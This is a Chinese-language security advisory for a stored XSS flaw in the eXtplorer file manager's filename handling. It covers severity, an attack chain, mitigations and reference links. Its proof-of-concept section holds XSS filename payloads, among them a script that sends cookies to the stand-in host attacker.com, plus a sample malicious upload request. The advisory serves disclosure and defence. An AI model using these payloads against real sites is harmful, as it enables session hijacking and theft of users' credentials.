CVE-2025-13058: eXtplorer跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-13058

漏洞类型

XSS跨站脚本

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

soerennb eXtplorer <= 2.1.15

漏洞概述

CVE-2025-13058是eXtplorer文件管理器插件中的一个存储型跨站脚本(XSS)漏洞。该漏洞存在于eXtplorer的Filename Handler组件中，攻击者可以通过构造恶意的文件名来注入恶意脚本代码。由于该漏洞需要用户交互才能触发，攻击者需要诱使受害者访问或处理包含恶意文件名的文件列表页面。当受害者查看文件列表时，恶意脚本代码将在其浏览器上下文中执行，可能导致会话劫持、敏感信息窃取或进一步的钓鱼攻击。此漏洞影响eXtplorer 2.1.15及之前的所有版本，CVSS评分为3.5，属于低危漏洞。

技术细节

该漏洞存在于eXtplorer的文件名处理模块中。当用户上传或重命名文件时，应用程序未能对文件名进行充分的输入验证和输出编码。攻击者可以在文件名中嵌入HTML或JavaScript代码，如<script>alert(document.cookie)</script>。当其他用户浏览文件目录时，这些恶意文件名会被直接渲染到页面的HTML输出中，导致恶意脚本在受害者浏览器中执行。由于漏洞位于文件名处理组件中，且影响文件列表的展示功能，因此所有浏览该目录的用户都可能受到影响。修复补丁(commit: 002def70b985f7012586df2c44368845bf405ab3)添加了对文件名的过滤和编码处理。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标网站使用eXtplorer文件管理器，并确定其版本是否在2.1.15或更早版本

STEP 2

初始访问

攻击者获取eXtplorer的上传权限（通过合法账户或漏洞），上传包含恶意文件名的文件

STEP 3

Payload植入

恶意文件名（如<img src=x onerror=alert(1)>）被存储在服务器文件系统中

STEP 4

诱导用户

攻击者诱使受害者访问eXtplorer的文件浏览页面

STEP 5

漏洞触发

受害者浏览器加载文件列表页面时，未经过滤的文件名被渲染到HTML中

STEP 6

代码执行

恶意JavaScript代码在受害者浏览器上下文中执行，可窃取Cookie、会话令牌等敏感信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-13058 PoC - XSS in eXtplorer Filename Handler
// Attack Vector: Upload a file with malicious filename
// Trigger: When victim views the file list

// Malicious filename to upload:
const maliciousFilename = '<img src=x onerror="alert(document.cookie)">malicious.txt';

// Or using script tag:
const maliciousFilename2 = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>';

// Exploitation steps:
// 1. Upload file with malicious filename to eXtplorer server
// 2. Wait for victim to browse the file directory
// 3. Malicious script executes in victim's browser context

// Example using eXtplorer API:
/*
POST /extplorer/action.php HTTP/1.1
Host: target.com
Content-Type: multipart/form-data

------WebKitFormBoundary
Content-Disposition: form-data; name="dir"

/var/www/html/
------WebKitFormBoundary
Content-Disposition: form-data; name="filename"; filename="<img src=x onerror=alert(document.domain)>test.txt"
Content-Type: text/plain

test content
------WebKitFormBoundary--
*/

影响范围

soerennb eXtplorer <= 2.1.15

防御指南

临时缓解措施

在官方补丁发布前，可通过以下措施缓解风险：1) 限制eXtplorer的文件上传功能，仅允许受信任用户上传文件；2) 在Web应用防火墙(WAF)中配置规则，检测和拦截文件名中的恶意模式；3) 启用HTTPOnly和Secure标志保护Cookie；4) 定期审计eXtplorer的使用情况和日志，检测异常行为；5) 考虑使用内容安全策略(CSP)头部限制内联脚本执行。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13058
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13058
3 Details https://www.cvedetails.com/cve/CVE-2025-13058/
4 VulDB https://vuldb.com/cve/CVE-2025-13058
5 Link https://github.com/soerennb/extplorer/
6 Link https://github.com/soerennb/extplorer/commit/002def70b985f7012586df2c44368845bf405ab3
7 Link https://github.com/soerennb/extplorer/issues/33
8 Link https://vuldb.com/?ctiid.332185
9 Link https://vuldb.com/?id.332185
10 Link https://vuldb.com/?submit.682370
11 Link https://github.com/soerennb/extplorer/issues/33